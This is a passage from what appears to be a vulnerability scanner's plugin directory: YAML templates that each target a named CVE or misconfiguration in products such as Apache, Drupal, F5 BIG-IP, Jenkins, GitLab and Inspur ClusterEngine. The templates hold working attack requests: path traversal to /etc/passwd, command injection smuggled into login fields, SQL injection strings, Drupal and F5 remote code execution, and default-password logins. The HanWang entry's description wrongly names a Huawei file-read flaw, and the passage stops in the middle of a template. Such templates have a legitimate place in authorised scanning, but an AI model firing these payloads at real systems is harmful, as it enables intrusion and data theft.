32 |
--------------------------------------------------------------------------------
/core/plugins/exploits/Apache目录穿越漏洞_CVE-2021-41773.yaml:
--------------------------------------------------------------------------------
1 | app: Apache
2 | query: header:"apache"
3 | meta:
4 | name: Apache目录穿越漏洞 CVE-2021-41773
5 | level: 4
6 | tags:
7 | - path_traversal
8 | description: 根据发布的安全公告,该问题 (CVE-2021-41773) 可能允许路径遍历和随后的文件泄露。路径遍历问题允许未经授权的人访问 Web
9 | 服务器上的文件,方法是欺骗 Web 服务器或在其上运行的 Web 应用程序返回存在于 Web 根文件夹之外的文件。
10 | homepage: https://httpd.apache.org/
11 | author: 一曲成殇
12 | references: https://mp.weixin.qq.com/s?src=11×tamp=1636121508&ver=3418&signature=e0tUPf*brAkQNYPZ0PkuM5RFY6csTt7zYhTNkUmzx0qaYw3sktdd78KkJ0TZtHYp*leXRZZZUsZ15HbQjwipqpV0kmm8mvGfcsUHfhtfPBgbxQdufrBBdKLe*PtyRveN&new=1
13 | solution: |+
14 | 升级至2.4.50版本
15 | steps:
16 | verify_steps:
17 | type: and
18 | verify:
19 | - request:
20 | method: GET
21 | path: /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
22 | redirect: false
23 | header: [ ]
24 | params: ""
25 | response:
26 | - name: code
27 | value: "200"
28 | type: equals
29 | - name: body
30 | value: /sbin/
31 | type: contains
32 | create_at: "2021-11-05 22:18:40"
33 |
--------------------------------------------------------------------------------
/core/plugins/exploits/Aspcms_backend_leak.yaml:
--------------------------------------------------------------------------------
1 | app: aspcms
2 | query: body:"aspcms"
3 | meta:
4 | name: Aspcms backend leak
5 | level: 4
6 | tags:
7 | - information_leakage
8 | description: '-'
9 | homepage: http://www.aspcmswang.com/
10 | author: 一曲成殇
11 | references: ''
12 | solution: 升级版本
13 | steps:
14 | verify_steps:
15 | type: and
16 | verify:
17 | - request:
18 | method: GET
19 | path: /plug/oem/AspCms_OEMFun.asp
20 | redirect: true
21 | header: [ ]
22 | params: ""
23 | response:
24 | - name: code
25 | value: "200"
26 | type: equals
27 | - name: body
28 | value: username
29 | type: contains
30 | create_at: "2021-11-05 22:41:06"
31 |
--------------------------------------------------------------------------------
/core/plugins/exploits/Atlassian Jira 信息泄露漏洞 CVE-2020-14181.yaml:
--------------------------------------------------------------------------------
1 | app: Atlassian Jira
2 | query: app:"Atlassian Jira"
3 | meta:
4 | name: Atlassian Jira 信息泄露漏洞 CVE-2020-14181
5 | level: 3
6 | tags:
7 | - ultra_vires
8 | description: Jira存在一个未授权访问漏洞,未授权的用户可以通过一个api接口直接查询到某用户名的存在情况,该接口不同于CVE-2019-8446和CVE-2019-3403的接口,是一个新的接口。如果Jira暴露在公网中,未授权用户就可以直接访问该接口爆破出潜在的用户名。
9 | homepage: https://ones.ai/
10 | author: Administrator
11 | references: https://blog.csdn.net/xuandao_ahfengren/article/details/115003863
12 | solution: 升级到安全版本
13 | steps:
14 | variable:
15 | - r1: randomLowercase(5)
16 | verify_steps:
17 | type: and
18 | verify:
19 | - request:
20 | method: POST
21 | path: /secure/ViewUserHover.jspa?username={{r1}}
22 | redirect: true
23 | header: [ ]
24 | params: ""
25 | response:
26 | - name: code
27 | value: "200"
28 | type: equals
29 | - name: body
30 | value: '{{r1}}'
31 | type: contains
32 | create_at: "2022-05-23 11:05:57"
33 |
--------------------------------------------------------------------------------
/core/plugins/exploits/Atlassian_Confluence_信息泄露漏洞.yaml:
--------------------------------------------------------------------------------
1 | app: Atlassian Confluence
2 | query: app:"Atlassian Confluence"
3 | meta:
4 | name: Atlassian Confluence 信息泄露漏洞
5 | level: 3
6 | tags:
7 | - information_leakage
8 | description: AtlassianConfluence是澳大利亚Atlassian公司的一套专业的企业知识管理与协同软件,也可以用于构建企业WiKi。该软件可实现团队成员之间的协作和知识共享。AtlassianConfluence5.8.17之前版本中存在安全,该漏洞源于spaces/viewdefaultdecorator.action和admin/viewdefaultdecorator.action文件没有充分过滤‘decoratorName’参数。远程攻击者可利用该漏洞读取配置文件。
9 | homepage: https://www.atlassian.com/software/confluence
10 | author: 一曲成殇
11 | references: https://www.anquanke.com/vul/id/1150798
12 | solution: 升级系统版本
13 | steps:
14 | verify_steps:
15 | type: and
16 | verify:
17 | - request:
18 | method: GET
19 | path: /spaces/viewdefaultdecorator.action?decoratorName
20 | redirect: false
21 | header: [ ]
22 | params: ""
23 | response:
24 | - name: body
25 | value: confluence-init.properties
26 | type: contains
27 | - name: code
28 | value: "200"
29 | type: equals
30 | create_at: "2021-11-06 18:17:14"
31 |
--------------------------------------------------------------------------------
/core/plugins/exploits/CVE-2018-1000110 用户枚举.yaml:
--------------------------------------------------------------------------------
1 | app: Jenkins
2 | query: app:"Jenkins"
3 | meta:
4 | name: CVE-2018-1000110 用户枚举
5 | level: 3
6 | tags:
7 | - enumeration
8 | description: Git Plugin是使用在其中的一个版本控制插件。CloudBees Jenkins Git Plugin 3.7.0及之前版本中的GitStatus.java文件存在安全漏洞。攻击者可利用该漏洞获取节点和用户列表。
9 | homepage: https://www.jenkins.io/
10 | author: 一曲成殇
11 | references: https://www.freebuf.com/news/242764.html
12 | solution: 升级软件版本
13 | steps:
14 | verify_steps:
15 | type: and
16 | verify:
17 | - request:
18 | method: GET
19 | path: /search/?q=a
20 | redirect: false
21 | header: [ ]
22 | params: ""
23 | response:
24 | - name: body
25 | value: Search for 'a'
26 | type: contains
27 | create_at: "2022-04-27 14:34:57"
28 |
--------------------------------------------------------------------------------
/core/plugins/exploits/CVE-2021-41277_Metabase_任意文件读取.yaml:
--------------------------------------------------------------------------------
1 | app: Metabase
2 | query: app:"Metabase"
3 | meta:
4 | name: CVE-2021-41277 Metabase 任意文件读取
5 | level: 4
6 | tags:
7 | - file_include
8 | description: metabase 是一个简单、开源的数据分析平台。在受影响的版本中,自定义 GeoJSON 地图(admin->settings->maps->custom maps->add a map)操作缺少权限验证,攻击者可通过该漏洞获得敏感信息。
9 | homepage: https://www.metabase.com/
10 | author: 一曲成殇
11 | references: https://nosec.org/home/detail/4909.html
12 | solution: 参考漏洞影响范围,及时升级至最新安全版本:https://github.com/metabase/metabase
13 | steps:
14 | verify_steps:
15 | type: and
16 | verify:
17 | - request:
18 | method: GET
19 | path: /api/geojson?url=file:/etc/passwd
20 | redirect: false
21 | header: [ ]
22 | params: ""
23 | response:
24 | - name: body
25 | value: /sbin:/
26 | type: contains
27 | create_at: "2021-11-24 10:18:55"
28 |
--------------------------------------------------------------------------------
/core/plugins/exploits/China_Mobile_Yu_routed_the_login_bypass.yaml:
--------------------------------------------------------------------------------
1 | app: 中移禹路由器
2 | query: body:"中移"
3 | meta:
4 | name: China_Mobile_Yu_routed_the_login_bypass
5 | level: 4
6 | tags:
7 | - ultra_vires
8 | description: ""
9 | homepage: https://prismx.io/
10 | author: Administrator
11 | references: ""
12 | solution: ""
13 | steps:
14 | verify_steps:
15 | type: and
16 | verify:
17 | - request:
18 | method: GET
19 | path: /simple-index.asp
20 | redirect: true
21 | header: [ ]
22 | params: ""
23 | response:
24 | - name: body
25 | value: 无线密码
26 | type: contains
27 | create_at: "2022-05-23 11:14:09"
28 |
--------------------------------------------------------------------------------
/core/plugins/exploits/Citrix_Cve-2020-8191-XSS.yaml:
--------------------------------------------------------------------------------
1 | app: Citrix
2 | query: app:"Citrix"
3 | meta:
4 | name: Citrix Cve-2020-8191-XSS
5 | level: 3
6 | tags:
7 | - xss
8 | description: xss
9 | homepage: https://www.citrix.com/
10 | author: 一曲成殇
11 | references: https://www.citrix.com/blogs/2020/07/07/citrix-provides-context-on-security-bulletin-ctx276688/
12 | solution: 升级固件版本
13 | steps:
14 | verify_steps:
15 | type: and
16 | verify:
17 | - request:
18 | method: POST
19 | path: /menu/stapp
20 | redirect: true
21 | header:
22 | - Content-Type: application/x-www-form-urlencoded
23 | params: sid=254&pe=1,2,3,4,5&appname=&au=1&username=nsroot
24 | response:
25 | - name: body
26 | value: "121332121212"
27 | type: contains
28 | create_at: "2021-11-06 15:22:03"
29 |
--------------------------------------------------------------------------------
/core/plugins/exploits/ClusterEngineV4.0 RCE (CVE-2020-21224).yaml:
--------------------------------------------------------------------------------
1 | app: ClusterEngineV4.0
2 | query: title:"TSCEV4.0"
3 | meta:
4 | name: ClusterEngineV4.0 RCE (CVE-2020-21224)
5 | level: 4
6 | tags:
7 | - remote_code_execution
8 | description: The dangerous characters in Inspur server cluster management system are unfiltered, resulting in remote command execution
9 | homepage: https://en.inspur.com/
10 | author: Administrator
11 | references: ""
12 | solution: update
13 | steps:
14 | verify_steps:
15 | type: and
16 | verify:
17 | - request:
18 | method: POST
19 | path: /login
20 | redirect: true
21 | header:
22 | - Content-Type: application/x-www-form-urlencoded
23 | params: op=login&username=peiqi`$(cat /etc/passwd)`
24 | response:
25 | - name: code
26 | value: "200"
27 | type: equals
28 | - name: body
29 | value: 'root:x:'
30 | type: contains
31 | create_at: "2022-05-23 11:46:14"
32 |
--------------------------------------------------------------------------------
/core/plugins/exploits/ClusterEngine_V4_0_Shell_cluster_RCE.yaml:
--------------------------------------------------------------------------------
1 | app: ClusterEngine V4.0
2 | query: body:"ClusterEngine V4.0"
3 | meta:
4 | name: ClusterEngine V4.0 Shell cluster RCE
5 | level: 4
6 | tags:
7 | - remote_code_execution
8 | description: Remote command execution exists in Inspur clusterengine v4.0. Attackers can obtain server permissions by sending special requests
9 | homepage: https://en.inspur.com/
10 | author: Administrator
11 | references: ""
12 | solution: Attackers can obtain server permissions by sending special requests
13 | steps:
14 | verify_steps:
15 | type: and
16 | verify:
17 | - request:
18 | method: POST
19 | path: /sysShell
20 | redirect: true
21 | header:
22 | - Content-Type: application/x-www-form-urlencoded
23 | params: op=doPlease&node=cu01&command=cat /etc/passwd
24 | response:
25 | - name: code
26 | value: "200"
27 | type: equals
28 | - name: body
29 | value: root
30 | type: contains
31 | create_at: "2022-05-23 11:19:05"
32 |
--------------------------------------------------------------------------------
/core/plugins/exploits/Coremail邮件系统配置文件信息泄露.yaml:
--------------------------------------------------------------------------------
1 | app: Coremail
2 | query: body:"coremail"
3 | meta:
4 | name: Coremail邮件系统配置文件信息泄露
5 | level: 4
6 | tags:
7 | - information_leakage
8 | description: 该漏洞可造成Coremail的配置文件信息泄露,包括数据库连接的用户名、密码等敏感信息。攻击者可能会通过这些敏感信息的收集,从而进一步尝试获取权限和数据的攻击。
9 | homepage: https://www.coremail.cn/
10 | author: 一曲成殇
11 | references: https://www.secpulse.com/archives/107611.html
12 | solution: 升级Coremail至最新版本
13 | steps:
14 | verify_steps:
15 | type: and
16 | verify:
17 | - request:
18 | method: GET
19 | path: /mailsms/s?func=ADMIN:appState&dumpConfig=/
20 | redirect: false
21 | header: [ ]
22 | params: ""
23 | response:
24 | - name: code
25 | value: "200"
26 | type: equals
27 | - name: body
28 | value: cm_md_db
29 | type: contains
30 | create_at: "2021-11-06 21:23:31"
31 |
--------------------------------------------------------------------------------
/core/plugins/exploits/D-Link AC集中管理系统默认弱口令.yaml:
--------------------------------------------------------------------------------
1 | app: D-Link AC管理系统
2 | query: title:"AC集中管理平台"
3 | meta:
4 | name: D-Link AC集中管理系统默认弱口令
5 | level: 3
6 | tags:
7 | - weak_password
8 | description: D-Link AC管理系统存在默认账号密码,可被获取敏感信息
9 | homepage: http://www.dlink.com.cn/
10 | author: Administrator
11 | references: http://t.zoukankan.com/lanyincao-p-14714705.html
12 | solution: 更新复杂密码
13 | steps:
14 | verify_steps:
15 | type: and
16 | verify:
17 | - request:
18 | method: POST
19 | path: /login.cgi
20 | redirect: true
21 | header:
22 | - Content-Type: application/x-www-form-urlencoded
23 | params: user=admin&password=admin
24 | response:
25 | - name: code
26 | value: "200"
27 | type: equals
28 | - name: body
29 | value: flag=0
30 | type: not contains
31 | create_at: "2022-05-23 10:55:55"
32 |
--------------------------------------------------------------------------------
/core/plugins/exploits/DLink_CVE-2020-25078_Account_Disclosure.yaml:
--------------------------------------------------------------------------------
1 | app: D-Link
2 | query: body:"D-Link"
3 | meta:
4 | name: DLink CVE-2020-25078 Account Disclosure
5 | level: 4
6 | tags:
7 | - information_leakage
8 | description: D-Link DCS系列监控 通过访问特定的URL得到账号密码信息,攻击者通过漏洞进入后台可以获取视频监控页面
9 | homepage: http://www.dlink.com.cn/
10 | author: 一曲成殇
11 | references: https://www.cnblogs.com/lanyincao/p/14714683.html
12 | solution: 设置接口访问白名单、升级系统版本
13 | steps:
14 | verify_steps:
15 | type: and
16 | verify:
17 | - request:
18 | method: GET
19 | path: /config/getuser?index=0
20 | redirect: false
21 | header: [ ]
22 | params: ""
23 | response:
24 | - name: code
25 | value: "200"
26 | type: equals
27 | - name: body
28 | value: pass=
29 | type: equals
30 | create_at: "2021-11-08 22:07:13"
31 |
--------------------------------------------------------------------------------
/core/plugins/exploits/Docker_Api_Unauthorized_Rce.yaml:
--------------------------------------------------------------------------------
1 | app: docker
2 | query: app:"docker"
3 | meta:
4 | name: Docker Api Unauthorized Rce
5 | level: 4
6 | tags:
7 | - remote_code_execution
8 | - ultra_vires
9 | description: 该未授权访问漏洞是因为docker remote api可以执行docker命令,从官方文档可以看出,该接口是目的是取代docker
10 | 命令界面,通过url操作docker。
11 | homepage: https://www.docker.com
12 | author: 一曲成殇
13 | references: https://blog.csdn.net/deeplearnings/article/details/77368582?utm_medium=distribute.pc_relevant.none-task-blog-2~default~baidujs_title~default-1.no_search_link&spm=1001.2101.3001.4242.2
14 | solution: 设置接口访问策略
15 | steps:
16 | verify_steps:
17 | type: and
18 | verify:
19 | - request:
20 | method: GET
21 | path: /info
22 | redirect: false
23 | header: [ ]
24 | params: ""
25 | response:
26 | - name: body
27 | value: DockerRootDir
28 | type: contains
29 | create_at: "2021-11-09 17:12:47"
30 |
--------------------------------------------------------------------------------
/core/plugins/exploits/Druid_Monitor_Unauth.yaml:
--------------------------------------------------------------------------------
1 | app: Apache Druid
2 | query: protocol:"http"
3 | meta:
4 | name: Druid Monitor Unauth
5 | level: 3
6 | tags:
7 | - ultra_vires
8 | description: Druid是阿里巴巴数据库出品的,为监控而生的数据库连接池,并且Druid提供的监控功能,监控SQL的执行时间、监控Web URI的请求、Session监控,首先Druid是不存在什么漏洞的。但当开发者配置不当时就可能造成未授权访问。
9 | homepage: https://druid.apache.org/
10 | author: 一曲成殇
11 | references: https://www.cnblogs.com/scivous/p/14003794.html
12 | solution: 设置接口访问规则
13 | steps:
14 | verify_steps:
15 | type: and
16 | verify:
17 | - request:
18 | method: GET
19 | path: /druid/index.html
20 | redirect: false
21 | header: [ ]
22 | params: ""
23 | response:
24 | - name: code
25 | value: "200"
26 | type: equals
27 | - name: body
28 | value: DruidVersion
29 | type: contains
30 | create_at: "2021-11-08 22:32:03"
31 |
--------------------------------------------------------------------------------
/core/plugins/exploits/Drupal_CVE-2014-3704-sqli.yaml:
--------------------------------------------------------------------------------
1 | app: Drupal
2 | query: body:"drupal"
3 | meta:
4 | name: Drupal CVE-2014-3704-sqli
5 | level: 4
6 | tags:
7 | - sql_injection
8 | description: Drupal 是一款用量庞大的CMS,其中存在一处无需认证的SQL漏洞。通过该漏洞,攻击者可以执行任意SQL语句,插入、修改管理员信息,甚至执行任意代码
9 | homepage: https://www.drupal.org/
10 | author: 一曲成殇
11 | references: https://blog.csdn.net/smli_ng/article/details/115496447
12 | solution: 升级版本
13 | steps:
14 | verify_steps:
15 | type: and
16 | verify:
17 | - request:
18 | method: POST
19 | path: /?q=node&destination=node
20 | redirect: true
21 | header: [ ]
22 | params: pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0
23 | or updatexml(0x23,concat(1,md5(666)),1)%23]=bob&name[0]=a
24 | response:
25 | - name: code
26 | value: "500"
27 | type: equals
28 | - name: body
29 | value: fae0b27c451c728867a567e8c1bb4e53
30 | type: contains
31 | create_at: "2021-11-08 23:04:41"
32 |
--------------------------------------------------------------------------------
/core/plugins/exploits/Drupal_CVE-2018-7600_RCE.yaml:
--------------------------------------------------------------------------------
1 | app: Drupal
2 | query: body:"drupal"
3 | meta:
4 | name: Drupal CVE-2018-7600 RCE
5 | level: 4
6 | tags:
7 | - remote_code_execution
8 | description: 攻击者可以利用该漏洞执行恶意代码,导致网站完全被控制。
9 | homepage: https://www.drupal.org/
10 | author: 一曲成殇
11 | references: https://paper.seebug.org/567/
12 | solution: 升级系统版本
13 | steps:
14 | verify_steps:
15 | type: and
16 | verify:
17 | - request:
18 | method: POST
19 | path: /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax
20 | redirect: false
21 | header:
22 | - Content-Type: application/x-www-form-urlencoded
23 | params: ' form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=printf&mail[#type]=markup&mail[#markup]=echo
24 | he151xx515x4'
25 | response:
26 | - name: body
27 | value: he151xx515x4
28 | type: contains
29 | create_at: "2021-11-09 21:49:04"
30 |
--------------------------------------------------------------------------------
/core/plugins/exploits/Ecshop_CNVD-2020-58823-SQLI.yaml:
--------------------------------------------------------------------------------
1 | app: ECShop
2 | query: header:"ecs_id"
3 | meta:
4 | name: Ecshop CNVD-2020-58823-SQLI
5 | level: 4
6 | tags:
7 | - sql_injection
8 | description: 参数过滤不严谨导致sql注入
9 | homepage: https://www.ecshop.com/
10 | author: 一曲成殇
11 | references: https://mp.weixin.qq.com/s/1t0uglZNoZERMQpXVVjIPw
12 | solution: 对请求参数进行过滤。
13 | steps:
14 | verify_steps:
15 | type: and
16 | verify:
17 | - request:
18 | method: POST
19 | path: /delete_cart_goods.php
20 | redirect: true
21 | header: [ ]
22 | params: id=0||(updatexml(1,concat(0x7e,(select%20md5(hevcstools)),0x7e),1))
23 | response:
24 | - name: body
25 | value: 7d41f560a1970ad115f25797dd157ff
26 | type: contains
27 | - name: code
28 | value: "200"
29 | type: equals
30 | create_at: "2021-11-09 22:26:47"
31 |
--------------------------------------------------------------------------------
/core/plugins/exploits/ElasticSearch_api_未授权访问.yaml:
--------------------------------------------------------------------------------
1 | app: Elasticsearch
2 | query: body:"cluster_uuid"
3 | meta:
4 | name: ElasticSearch api 未授权访问
5 | level: 4
6 | tags:
7 | - ultra_vires
8 | description: 未授权访问导致数据信息泄露,部分版本或插件存在漏洞,严重可导致服务器被入侵
9 | homepage: https://github.com/elasticsearch/elasticsearch
10 | author: 一曲成殇
11 | references: https://blog.csdn.net/qq_32393893/article/details/105387471
12 | solution: 关闭对外访问、设置访问策略
13 | steps:
14 | verify_steps:
15 | type: and
16 | verify:
17 | - request:
18 | method: GET
19 | path: /_cat
20 | redirect: false
21 | header: [ ]
22 | params: ""
23 | response:
24 | - name: body
25 | value: /_cat/master
26 | type: contains
27 | - name: code
28 | value: "200"
29 | type: equals
30 | create_at: "2021-11-08 17:25:33"
31 |
--------------------------------------------------------------------------------
/core/plugins/exploits/F5_BIG-IP代码执行漏(CVE-2021-22986).yaml:
--------------------------------------------------------------------------------
1 | app: F5-BigIP
2 | query: app:"F5-BigIP"
3 | meta:
4 | name: F5 BIG-IP代码执行漏洞(CVE-2021-22986)
5 | level: 4
6 | tags:
7 | - remote_code_execution
8 | description: F5 BIG-IP/BIG-IQ iControl REST 未授权远程代码执行漏洞中,未经身份验证的攻击者可通过iControl REST接口,构造恶意请求,执行任意系统命令。
9 | homepage: https://www.f5.com/products/big-ip-services
10 | author: Administrator
11 | references: https://www.freebuf.com/vuls/268254.html
12 | solution: 升级至安全版本
13 | steps:
14 | verify_steps:
15 | type: and
16 | verify:
17 | - request:
18 | method: POST
19 | path: /mgmt/tm/util/bash
20 | redirect: true
21 | header:
22 | - Authorization: Basic YWRtaW46QVNhc1M=
23 | - { }
24 | params: '{"command":"run","utilCmdArgs":"-c id"}'
25 | response:
26 | - name: code
27 | value: "200"
28 | type: equals
29 | - name: body
30 | value: dHN4dHMK
31 | type: contains
32 | create_at: "2022-05-23 11:57:10"
33 |
--------------------------------------------------------------------------------
/core/plugins/exploits/F5_Tmui_CVE-2020-5902_RCE.yaml:
--------------------------------------------------------------------------------
1 | app: F5-BigIP
2 | query: header:"MRHSession"
3 | meta:
4 | name: F5 Tmui CVE-2020-5902 RCE
5 | level: 4
6 | tags:
7 | - remote_code_execution
8 | description: '未授权的远程攻击者通过向该页面发送特制的请求包,可以造成任意Java 代码执行。进而控制F5 BIG-IP的全部功能,包括但不限于:
9 | 执行任意系统命令、开启/禁用服务、创建/删除服务器端文件等。'
10 | homepage: https://f5.com
11 | author: 一曲成殇
12 | references: https://support.f5.com/csp/article/K52145254
13 | solution: 升级版本
14 | steps:
15 | verify_steps:
16 | type: and
17 | verify:
18 | - request:
19 | method: POST
20 | path: /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp
21 | redirect: true
22 | header:
23 | - Content-Type: application/x-www-form-urlencoded
24 | params: fileName=%2Fetc%2Ff5-release
25 | response:
26 | - name: code
27 | value: "200"
28 | type: equals
29 | - name: body
30 | value: BIG-IP release
31 | type: contains
32 | create_at: "2021-11-10 10:04:39"
33 |
--------------------------------------------------------------------------------
/core/plugins/exploits/FineReport(帆软)报表系统目录遍历漏洞.yaml:
--------------------------------------------------------------------------------
1 | app: FineReport
2 | query: app:"FineReport"
3 | meta:
4 | name: FineReport(帆软)报表系统目录遍历漏洞
5 | level: 4
6 | tags:
7 | - path_traversal
8 | description: 漏洞影响FineReport v8.0、FineReport v9.0
9 | homepage: https://gobies.org/
10 | author: Administrator
11 | references: ""
12 | solution: 升级至安全版本
13 | steps:
14 | verify_steps:
15 | type: and
16 | verify:
17 | - request:
18 | method: POST
19 | path: /WebReport/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=../../../../../../../../../../../../etc¤tUserName=admin¤tUserId=1&isWebReport=true
20 | redirect: true
21 | header: [ ]
22 | params: ""
23 | response:
24 | - name: code
25 | value: "200"
26 | type: equals
27 | - name: body
28 | value: etc/passwd
29 | type: contains
30 | create_at: "2022-05-23 13:53:04"
31 |
--------------------------------------------------------------------------------
/core/plugins/exploits/Gitlab_CNVD-2021-14193_InfoLeak.yaml:
--------------------------------------------------------------------------------
1 | app: GitLab
2 | query: body:"GitLab"
3 | meta:
4 | name: Gitlab CNVD-2021-14193 InfoLeak
5 | level: 4
6 | tags:
7 | - information_leakage
8 | description: GitLab中存在Graphql接口 输入构造的数据时会泄露用户邮箱和用户名
9 | homepage: https://about.gitlab.com/
10 | author: 一曲成殇
11 | references: https://www.cnvd.org.cn/flaw/show/CNVD-2021-14193
12 | solution: 升级系统版本或参考https://gitlab.com/gitlab-org/gitlab/-/issues/244275
13 | steps:
14 | verify_steps:
15 | type: and
16 | verify:
17 | - request:
18 | method: POST
19 | path: /api/graphql
20 | redirect: true
21 | header:
22 | - Content-Type: application/json
23 | params: '{"query":"{\nusers {\nedges {\n node {\n username\n email\n avatarUrl\n status {\n emoji\n message\n messageHtml\n }\n }\n }\n }\n }","variables":null,"operationName":null}'
24 | response:
25 | - name: body
26 | value: avatarUrl
27 | type: contains
28 | - name: code
29 | value: "200"
30 | type: equals
31 | create_at: "2021-11-09 17:28:41"
32 |
--------------------------------------------------------------------------------
/core/plugins/exploits/HIKVISION 视频编码设备接入网关 任意文件下载.yaml:
--------------------------------------------------------------------------------
1 | app: Hikvision
2 | query: title:"视频编码设备接入网关"
3 | meta:
4 | name: HIKVISION 视频编码设备接入网关 任意文件下载
5 | level: 3
6 | tags:
7 | - file_read
8 | description: 海康威视视频接入网关系统在页面/serverLog/downFile.php的参数fileName存在任意文件下载漏洞
9 | homepage: https://www.hikvision.com/cn/
10 | author: Administrator
11 | references: ""
12 | solution: ""
13 | steps:
14 | verify_steps:
15 | type: or
16 | verify:
17 | - request:
18 | method: GET
19 | path: /serverLog/downFile.php?fileName=../web/html/serverLog/downFile.php
20 | redirect: true
21 | header: [ ]
22 | params: ""
23 | response:
24 | - name: code
25 | value: "200"
26 | type: equals
27 | - name: body
28 | value: $file_name=
29 | type: contains
30 | create_at: "2022-05-23 14:27:06"
31 |
--------------------------------------------------------------------------------
/core/plugins/exploits/HanWang Time Attendance SQL injection.yaml:
--------------------------------------------------------------------------------
1 | app: HanWang Time Attendance
2 | query: title:"汉王人脸考勤管理系统"
3 | meta:
4 | name: HanWang Time Attendance SQL injection
5 | level: 4
6 | tags:
7 | - sql_injection
8 | description: HUAWEI HG659 lib存在任意文件读取漏洞,攻击者可通过该漏洞读取任意文件。
9 | homepage: https://www.hw99.com/
10 | author: Administrator
11 | references: ""
12 | solution: ""
13 | steps:
14 | verify_steps:
15 | type: or
16 | verify:
17 | - request:
18 | method: POST
19 | path: /Login/Check
20 | redirect: true
21 | header:
22 | - Content-type: application/x-www-form-urlencoded
23 | params: strName=admin' or 1=1--&strPwd=admin
24 | response:
25 | - name: code
26 | value: "200"
27 | type: equals
28 | - name: body
29 | value: ok
30 | type: contains
31 | create_at: "2022-05-23 14:25:14"
32 |
--------------------------------------------------------------------------------
/core/plugins/exploits/JBoss-CVE-2017-12149.yaml:
--------------------------------------------------------------------------------
1 | app: JBoss
2 | query: app:"JBoss"
3 | meta:
4 | name: JBoss-CVE-2017-12149
5 | level: 4
6 | tags:
7 | - remote_code_execution
8 | description: 漏洞为java反序列化错误,存在于jboss的Httplnvoker组件中的ReadOnlyAccessFilter过滤器中,该过滤器在没有对用户输入的数据进行安全检测的情况下,对数据流进行反序列化操作,进而导致了漏洞的发生。
9 | homepage: https://www.jboss.org/
10 | author: 一曲成殇
11 | references: https://www.cnblogs.com/7omss/p/15439985.html
12 | solution: 通过向http-invoker.sar的web.xml文件中的安全约束添加url-pattern>来保护对整个 http-invoker上下文的访问,不想使用http-invoker.sar可以将其删除
13 | steps:
14 | verify_steps:
15 | type: and
16 | verify:
17 | - request:
18 | method: GET
19 | path: /invoker/readonly
20 | redirect: false
21 | header: [ ]
22 | params: ""
23 | response:
24 | - name: code
25 | value: "500"
26 | type: equals
27 | create_at: "2022-04-27 14:27:53"
28 |
--------------------------------------------------------------------------------
/core/plugins/exploits/Jenkins未授权访问.yaml:
--------------------------------------------------------------------------------
1 | app: Jenkins
2 | query: app:"Jenkins"
3 | meta:
4 | name: Jenkins未授权访问
5 | level: 4
6 | tags:
7 | - ultra_vires
8 | description: Jenkins系统后台中可以执行系统脚本命令,(本作用是故障排除和诊断使用)
9 | homepage: https://jenkins.io/
10 | author: 一曲成殇
11 | references: https://blog.csdn.net/qq_45434762/article/details/115291413
12 | solution: 配置Jenkins登录验证
13 | steps:
14 | verify_steps:
15 | type: or
16 | verify:
17 | - request:
18 | method: GET
19 | path: /script
20 | redirect: false
21 | header: [ ]
22 | params: ""
23 | response:
24 | - name: body
25 | value: Groovy script
26 | type: contains
27 | - request:
28 | method: GET
29 | path: /computer/(master)/scripts
30 | redirect: false
31 | header: [ ]
32 | params: ""
33 | response:
34 | - name: body
35 | value: Groovy script
36 | type: contains
37 | create_at: "2022-04-27 14:48:51"
38 |
--------------------------------------------------------------------------------
/core/plugins/exploits/JingHe OA C6 Default password.yaml:
--------------------------------------------------------------------------------
1 | app: 金和协同管理平台
2 | query: app:"金和协同管理平台"
3 | meta:
4 | name: JingHe OA C6 Default password
5 | level: 4
6 | tags:
7 | - Default password
8 | description: The attacker will log in as an administrator
9 | homepage: jinher.com
10 | author: Administrator
11 | references: ""
12 | solution: ""
13 | steps:
14 | verify_steps:
15 | type: or
16 | verify:
17 | - request:
18 | method: POST
19 | path: /C6/Jhsoft.Web.login/AjaxForLogin.aspx
20 | redirect: false
21 | header:
22 | - Content-Type: application/x-www-form-urlencoded
23 | params: type=login&loginCode=YWRtaW4=&&pwd=MDAwMDAw&
24 | response:
25 | - name: code
26 | value: "200"
27 | type: equals
28 | - name: body
29 | value: OK
30 | type: contains
31 | - name: body
32 | value: 系统管理员
33 | type: contains
34 | create_at: "2022-05-23 14:34:08"
35 |
--------------------------------------------------------------------------------
/core/plugins/exploits/JingHe OA download.asp File read.yaml:
--------------------------------------------------------------------------------
1 | app: 金和协同管理平台
2 | query: app:"金和协同管理平台"
3 | meta:
4 | name: JingHe OA download.asp File read
5 | level: 4
6 | tags:
7 | - file_read
8 | description: There is an arbitrary file reading vulnerability in Jinhe OA C6 download.jsp file, through which an attacker can obtain sensitive information in the server
9 | homepage: http://www.jinher.com/
10 | author: Administrator
11 | references: ""
12 | solution: Update
13 | steps:
14 | verify_steps:
15 | type: or
16 | verify:
17 | - request:
18 | method: GET
19 | path: /C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config
20 | redirect: false
21 | header:
22 | - Content-type: application/x-www-form-urlencoded
23 | params: ""
24 | response:
25 | - name: body
26 | value: configuration
27 | type: contains
28 | - name: code
29 | value: "200"
30 | type: equals
31 | create_at: "2022-05-23 14:37:04"
32 |
--------------------------------------------------------------------------------
/core/plugins/exploits/Joomla_contushdvideoshare_任意文件读取漏洞.yaml:
--------------------------------------------------------------------------------
1 | app: Joomla
2 | query: app:"joomla"
3 | meta:
4 | name: Joomla contushdvideoshare 任意文件读取漏洞
5 | level: 4
6 | tags:
7 | - file_read
8 | description: Joomla contushdvideoshare 存在任意文件读取漏洞
9 | homepage: https://www.joomla.org/
10 | author: Administrator
11 | references: ""
12 | solution: ""
13 | steps:
14 | verify_steps:
15 | type: and
16 | verify:
17 | - request:
18 | method: GET
19 | path: /components/com_contushdvideoshare/hdflvplayer/download.php?f=../../../configuration.php
20 | redirect: true
21 | header: [ ]
22 | params: ""
23 | response:
24 | - name: body
25 | value: the joomla configuration.php contain the words
26 | type: contains
27 | create_at: "2022-05-24 16:30:04"
28 |
--------------------------------------------------------------------------------
/core/plugins/exploits/Joomla_departments_SQL注入.yaml:
--------------------------------------------------------------------------------
1 | app: Joomla
2 | query: app:"joomla"
3 | meta:
4 | name: Joomla departments SQL注入
5 | level: 4
6 | tags:
